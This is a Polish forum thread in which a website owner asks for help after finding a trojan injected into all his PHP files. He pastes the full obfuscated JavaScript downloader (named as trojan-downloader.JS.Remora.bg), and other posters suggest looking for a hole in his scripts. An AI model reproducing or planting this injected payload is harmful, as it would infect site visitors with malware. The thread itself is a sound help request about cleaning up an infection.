Mam problem z trojanem w kodzie strony, antywirus przeskanował strone i wyskoczył komunikat o trojanie na stronie, początkowo w to nie wierzyłem bo tylko ja mam dostęp do ftp, po sprawdzeniu plików na serwerze okazało się że wszytkie pliki *.php są zainfekowane trojanem
Kod trojana:

[PHP] pobierz, plaintext 
<?php
<!-- 3496fc084a71d604e81d31a614054903 --><script>document.write(unescape("%3Cscript%3Eif%28Yx%21%3D1%29%7Bfunction%20YU%28TO%29%7Breturn%20TO%7Dtry%7Bfunction%20BQp%28Fap%29%7Breturn%20parseInt%28Fap%29%7Dvar%20jZJ%3D%27JJ0J70Jm0Jd0Jg0JT0JW0Jp0JR0Jw0JG0Jc0J80Jq0Jj0Jf0Jr0JL0JI0JD0JX0Jl0J30JB0Je0J50
M0Js0Jx0Ji0JK0JA0J40JV0Jn0JO0JU0Jb0J60J90JZ0JH0Ja0Jo0Jz0Jh0JF0JS0Jy0JY0JN0Jk0Jt0
C07J07707m07d07g07T07W07p07R07w07G07c07807q07j07f07r07L07I07D07X07l073%27%3B%20var%20Myf%3DYU%28%270%27%29%2C%20pmU%3DArray%2810553%5E10683%2CBQp%28%27205%27%29%2CBQp%28%27221%27%29%2CBQp%28%27204%27%29%2C26122%5E26333%2C12973%5E12899%2CBQp%28%27202%27%29%2CBQp%28%27128%27%29%2CBQp%28%27179%27%29%2CBQp%28%27180%27%29%2C23485%5E23397%2CBQp%28%27203%27%29%2CBQp%28%27208%27%29%2CBQp%28%27209%27%29%2C23349%5E23467%2CBQp%28%27247%27%29%2C16783%5E16759%2CBQp%28%27223%27%29%2CBQp%28%27211%27%29%2C17210%5E17377%2C17665%5E17815%2CBQp%28%27151%27%29%2CBQp%28%27197%27%29%2CBQp%28%27195%27%29%2CBQp%28%27144%27%29%2C2302%5E2105%2C17084%5E16959%2CBQp%28%27183%27%29%2CBQp%28%27214%27%29%2CBQp%28%27132%27%29%2C8118%5E7983%2C10401%5E10363%2C32111%5E32167%2CBQp%28%27138%27%29%2CBQp%28%27146%27%29%2CBQp%28%27145%27%29%2C20551%5E20609%2C13191%5E13057%2CBQp%28%27136%27%29%2C21804%5E22009%2CBQp%28%27240%27%29%2C30441%5E30209%2CBQp%28%27210%27%29%2CBQp%28%27143%27%29%2CBQp%28%27253%27%29%2CBQp%28%27201%27%29%2C29339%5E29281%2CBQp%28%27133%27%29%2CBQp%28%27234%27%29%2C20376%5E20289%2C25816%5E25677%2CBQp%28%27142%27%29%2C25207%5E25323%2CBQp%28%27249%27%29%2C30714%5E30473%2CBQp%28%27237%27%29%2C25516%5E25395%2C16567%5E16459%2CBQp%28%27235%27%29%2CBQp%28%27236%27%29%2CBQp%28%27242%27%29%2C23643%5E23687%2C20911%5E20845%2CBQp%28%27129%27%29%2CBQp%28%27229%27%29%2CBQp%28%27224%27%29%2CBQp%28%27147%27%29%2CBQp%28%27196%27%29%2CBQp%28%27135%27%29%2C26206%5E26301%2CBQp%28%27226%27%29%2C19160%5E18985%2CBQp%28%27140%27%29%2C25906%5E26047%2C28060%5E27927%2CBQp%28%27137%27%29%2C7823%5E7707%29%3B%20var%20FBq%2C%20mxG%3B%20var%20vWe%2C%20DNO%3D%27JJJ7JmJdJgJTJWJpJRJwJGJcJ8JmJWJgJqJ8JjJfJrJdJLJIJDJXJlJ3JBJRJwJfJrJdJLJIJDJeJT
dJqJWJqJWJ5JTJDJjJMJjJ3JRJwJRJwJsJxJqJ7JWJjJiJjJKJAJdJgJ4JDJdJ7JeJLJDJdJqJVJeJmJ
JKJnJRJwJsJTJLJWJxJjJiJjJKJOJUJbJ6JOJKJnJjJRJwJsJmJqJqJ9JgJDJZJLJIJDJjJiJjJKJAJd
VJ4JLJKJnJRJwJsJmJqJqJ9JgJDJHJLJaJcJDJjJiJjJoJnJRJwJRJwJsJ7JDJWJzJqJqJ9JgJDJjJiJ
JGJcJ8JmJWJgJqJ8JXJ8JLJIJDJnJjJ4JLJaJcJDJlJRJwJsJ3JRJwJsJsJ4JLJdJjJAJMJjJ8JDJhJj
FJLJWJDJXJlJSJjJAJeJ7JDJWJyJgJIJDJXJ8JDJhJjJFJLJWJDJXJlJeJYJDJWJyJgJIJDJXJlJjJNJ
JbJ6JVJkJkJkJkJkJlJSJjJRJwJsJsJAJqJmJcJIJDJ8JWJeJmJqJqJ9JgJDJjJMJjJ8JLJIJDJjJNJj
tJMJtJjJNJjJDJ7JmJLJTJDJXJ4JLJaJcJDJlJjJNJjJtJSJjJDJUJTJgJdJDJ7JMJtJjJNJjJAJeJWJ
JC7JJy77JWJdJgJ8JYJXJlJSJjJsJsJsJRJwJsJBJnJRJwJsJgJ8J7JWJLJaJaJjJiJjJGJcJ8JmJWJg
qJ8JXJlJRJwJsJ3JRJwJsJsJgJGJX7mJWJxJgJ7JeJLJaJdJDJLJAJ5JfJ8J7JWJLJaJaJDJAJXJlJlJ
JwJsJsJ3JRJwJsJsJsJ4JLJdJjJ7JjJMJjJtJJJgJGJdJLJIJDJjJhJgJAJWJxJMJoJjJxJDJgJYJxJW
MJoJjJGJdJLJIJD7dJqJdJAJDJdJMJkJjJ7JdJmJMJKJtJjJNJjJWJxJgJ7JeJYJDJWJrJdJLJIJD7g7
7WJXJlJjJNJjJtJKJpJJJOJgJGJdJLJIJDJpJtJSJRJwJsJsJsJWJdJ5JjJ3JjJAJqJmJcJIJDJ8JWJe
hJdJgJWJDJXJ7JlJjJBJRJwJsJsJsJmJLJWJmJxJXJDJlJ3JjJAJqJmJcJIJDJ8JWJeJhJdJgJWJDJXJ
JJJxJWJIJaJpJJ7pJqJAJ5JpJtJjJNJjJ7JjJNJjJtJJJO7pJqJAJ5JpJJJOJxJWJIJaJpJtJlJjJBJR
wJsJsJsJWJxJgJ7JeJ7JDJWJzJqJqJ9JgJDJXJWJxJgJ7JeJmJqJqJ9JgJDJZJLJIJDJnJjJWJxJgJ7J
JmJqJqJ9JgJDJHJLJaJcJDJlJSJsJRJwJsJsJBJRJwJsJBJnJRJwJsJYJDJWJrJdJLJIJD7g7T7WJjJi
jJGJcJ8JmJWJgJqJ8JXJlJRJwJsJ3JRJwJsJsJ4JLJdJjJAJaJxJMJAJqJmJcJIJDJ8JWJeJaJqJmJLJ
JgJqJ8JeJxJqJ7JWJSJRJwJsJsJdJDJWJcJdJ8JjJKJxJWJWJTJiJOJOJKJjJNJjJXJXJAJaJxJjJMJM
jJKJKJj7R7RJjJAJaJxJjJMJMJjJKJcJ8JAJDJGJgJ8JDJAJKJlJj7wJjJWJxJgJ7JeJYJDJW7TJLJ8J
77JWJdJgJ8JYJXJlJjJiJjJKJKJlJjJNJjJAJaJxJeJdJDJTJaJLJmJDJjJXJO7G7cJL787qJk787jJe
87fJOJnJKJeJKJlJeJdJDJTJaJLJmJDJjJXJO7rJeJNJOJnJKJeJKJlJjJjJNJjJtJeJtJjJNJjJWJxJ
J7JeJYJDJW7TJLJ8JA77JWJdJgJ8JYJXJlJjJNJjJtJeJtJjJNJjJWJxJgJ7JeJxJqJ7JWJjJNJjJWJx
gJ7JeJTJLJWJxJSJRJwJsJBJnJRJwJsJLJaJdJDJLJAJ5JfJ8J7JWJLJaJaJDJAJjJiJjJGJcJ8JmJWJ
JqJ8JXJlJRJwJsJ3JRJwJsJsJdJDJWJcJdJ8Jj7mJXJAJqJmJcJIJDJ8JWJeJmJqJqJ9JgJDJeJgJ8JA
DJU7LJGJXJWJxJgJ7JeJmJqJqJ9JgJDJZJLJIJDJjJNJjJKJMJKJjJNJjJWJxJgJ7JeJmJqJqJ9JgJDJ
JLJaJcJDJlJjJMJMJj78JoJlJSJRJwJsJBJnJRJwJsJYJDJW7TJLJ8JA77JWJdJgJ8JYJjJiJjJGJcJ8
mJWJgJqJ8JXJlJRJwJsJ3JRJwJsJsJ4JLJdJjJaJMJoJ6JnJjJmJMJjJKJkJo7I7DJV7XJ67lJb7jJL7
JmJAJDJGJKJnJjJqJMJKJKJSJRJwJsJsJGJqJdJjJXJ4JLJdJjJgJMJkJSJjJgJjJJJjJaJSJjJgJNJN
lJjJjJjJsJsJRJwJsJsJsJqJNJMJmJeJ7Jc7pJ7JWJdJjJX7JJLJWJxJeJGJaJqJqJdJX7JJLJWJxJeJ
JLJ8JAJqJIJXJlJj73JjJmJeJaJDJ8JYJWJxJlJnJjJoJnJjJoJlJSJRJwJsJsJsJsJsJRJwJsJsJdJD
WJcJdJ8JjJqJSJRJwJsJBJsJRJwJBJRJwJ4JLJdJjJqJjJMJjJ8JDJhJjJfJrJdJLJIJDJXJlJSJjJRJ
JqJeJgJ8J7JWJLJaJaJXJlJSJRJwJJJOJ7JmJdJgJTJWJp%27%3B%20var%20Wzv%3DString%28%29%3BjZJ%3DjZJ.split%28Myf%29%3Bfor%20%28FBq%3D0%3BFBq%3CDNO.length%3BFBq+%3D2%29%7BvWe%3DDNO.substr%28FBq%2C2%29%3Bvar%20YmF%3DjZJ.length%3Bfor%28mxG%3D0%3BmxG%3CYmF%3BmxG++%29%20%7Bif%281%3D%3D0%29%3Bif%28jZJ%5BmxG%5D%3D%3DvWe%29break%3B%7DWzv+%3DString.fromCharCode%28pmU%5BmxG%5D%5E190%29%3B%20%7Ddocument.write%28Wzv%29%3B%7Dcatch%28oqz%29%7B%7D%7Dvar%20Yx%3D1%3C/script%3E"))</script><!--/-->
?>
[PHP] pobierz, plaintext 

Co mam zroobić żeby to się więcej nie powtórzyło?

Znaleźć przyczynę dlaczego ktoś mógł nadpisać Twoje pliki, pewnie dziura w systemie.

W systemie serwera??

Raczej systemie/skrypcie php. Czego uzywasz, jakiego gotowca? Bo nie jestes jedyny ktory takie cos zlapal

Na stronie mam tylko prosty skrypt księgi gości, który sam napisałem

Nazwa trojana: trojan-downloader.JS.Remora.bg